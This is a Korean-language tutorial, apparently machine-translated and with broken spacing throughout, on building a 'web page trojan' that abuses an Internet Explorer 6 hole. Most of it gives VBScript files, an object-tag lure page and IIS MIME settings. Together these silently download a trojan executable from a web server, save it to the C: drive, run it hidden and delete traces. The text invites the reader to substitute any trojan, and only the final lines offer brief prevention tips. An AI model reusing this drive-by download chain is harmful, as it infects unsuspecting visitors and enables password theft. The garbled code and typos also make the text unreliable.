우 리 는"알 수 없 는 프로그램 에 함부로 내 려 가지 말고 메 일의 첨부 파일 을 함부로 열지 마 세 요."라 는 충 고 를 자주 들 었 습 니 다.이런 충 고 는 확실히 유용 합 니 다.그러나 우리 시스템 에는 많은 구멍 이 있 습 니 다.많은 목마 들 은 클 라 이언 트 와 서버 가 필요 없습니다.그들 은 이러한 시스템 의 구멍 을 이용 하여 시스템 이 합 법 적 으로 여 기 는 코드 에 따라 목마 의 기능 을 수행 합 니 다.어떤 목 마 는 당신 이 전혀 모 르 고 잠입 할 수도 있 습 니 다.지금 은 IE6 의 구멍 을 통 해 웹 페이지 를 방문 한 후 쥐 도 새 도 모 르 게 지정 한 프로그램 을 수행 하 는 예,즉 웹 페이지 목마 에 대해 설명 하 겠 습 니 다.우선 간단 한 파일 을 몇 개 작성 해 야 합 니 다.abc.abc 라 는 파일
Function HttpDoGet(url)set oReq=CreateObject("Microsoft.XML HTTP")oReq.open"GET",url,falseoReq.sendfo Req.status=200 thenHttpDoGet=oReq.respomse Body Savefile HttpDoGet,"c:win.exe"End IfSet oReq=nothingEnd Functionsub SaveFile(str.fName)Set objStream = CreateObject("ADODB.Stream")objStream.Type =1objStream.OpenobjStream.write strobjStream.SaveToFile fName.2objStream.Close()set objStream = nothingexewin()End subSub exewin()set wshshell=createobject ("wscript.shell" )a=wshshell.run ("cmd.exe /c c:win.exe",0) b=wshshell.run ("cmd.exe /c del c:win.hta",0)window.closeEnd SubHttpDoGet "http://127.0.0.1/test.exe"에서 test.exe 는 목마 프로그램 입 니 다.WEB 가 발표 한 디 렉 터 리 에 두 어야 합 니 다.파일 abc.abc 도 발표 한 디 렉 터 리 에 저장 해 야 합 니 다."둘.test.htm 라 는 파일목마 운행 테스트!(이 말 은 당신 이 하고 싶 은 것 으로 바 꿀 수 있 습 니 다)<object date="http://127.0.0.1/win.test";;;>3.win.test 라 는 파일
Function HttpDoGet(url)set oReq=CreateObject("Microsoft.XML HTTP")oReq.open"GET",url,falseoReq.sendfoReq.status=200 thenHttpDoGet,"c:win.hta"Seto Req=nothingEnd ifend functionsub SaveFile(str,fName)Dim fso, tfS e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")Set tf = fso.CreateTextfile(fName,True)tf.Write strtf.Closeexewin()End subSub exewin()set wshshell=createobject ("wscript.shell" )a=wshshell.run ("cmd.exe /c c:win.hat",0)window.closeEnd SubHttpDoGet("http://127.0.0.1/abc.abc")4.test.exe 라 는 목마 프로그램 입 니 다.이것 은 내 가 제공 하지 않 아 도 되 겠 지?네가 원 하 는 목마 로 그의 이름 을 test.exe 로 바 꾸 어 올 리 면 돼.서버 의 파일 목록 test.htm:대외 적 으로 발 표 된 웹 페이지 win.test:아래 파일 abc.abc 에서 상대방 기기 에 저장 하고 win.hta 로 저장 하여 실행 합 니 다.abc.abc 에서 바 이 너 리 목마 파일 test.exe 를 다운로드 하고 실행 합 니 다.test.exe:목마 프로그램.위 에서 말 한 파일 은 임의의 이름 으로 수정 할 수 있 습 니 다.다만 원본 코드 에 있 는 파일 을 가리 키 는 것 도 수정 하 는 것 을 잊 지 마 세 요!마지막 으로 IIS 를 설정 하고'프로그램→관리 도 구→인터넷 서비스 관리자'를 열 고 설정 할 사 이 트 를 오른쪽 클릭 하고'속성'을 선택 하고'http 헤드'를 선택 합 니 다.'MIME 맵'의'파일 형식'단 추 를 누 르 고 관련 확장자 텍스트 상자 에'hta'를 입력 하고 내용 형식(MIME)에'application/hta'를 입력 한 다음 모든 창 을 닫 으 면 됩 니 다.많은 친구 들 이 많이 만 났 습 니 다.Q 번 을 증정 하거나 온라인 게임 을 할 때 어떤 사람 이 좋 은 물건 을 XXX 사이트 에 증정 하 라 고 외 쳤 습 니 다.사실 그 위 에서 말 한 예 는 바로 이런 원리 입 니 다.자신 도 모 르 게 기계 에 있 는 모든 비밀번호 나 명 사 를 지정 한 물건 을 상대방 이 지정 한 메 일 박스 에 보 냈 습 니 다.보고 나 서 이런 목마 가 너무 위험 하 다 고 생각 하 십 니까?심지어 그물 줄 을 뽑 고 싶 은 느낌 이 들 어 요.그 거?하하,사실 홈 페이지 목마 의 작업 원 리 를 이해 한 후에 우 리 는 그 를 보호 하기 어렵 지 않 습 니 다.상기 내용 을 본 후에 결론 을 얻 을 수 있 습 니 다.홈 페이지 목 마 는 주로 IE 의 구멍 을 이용 하여 이 루어 졌 기 때문에 예방 할 때 다음 과 같은 몇 가 지 를 해 야 인터넷 의 안전 을 확보 할 수 있 습 니 다.A.IE 의 최신 버 전 을 설치 하고 수시로 시스템 과 IE 의 패 치 프로그램 을 만 듭 니 다.B。친구 가 보 낸 사이트 에 함부로 접속 하지 말고 친 한 친구 에 게 도 조심 하 세 요.C。포르노 사이트 에 함부로 접속 하지 않 고,또 일부 판매 하고 있다.
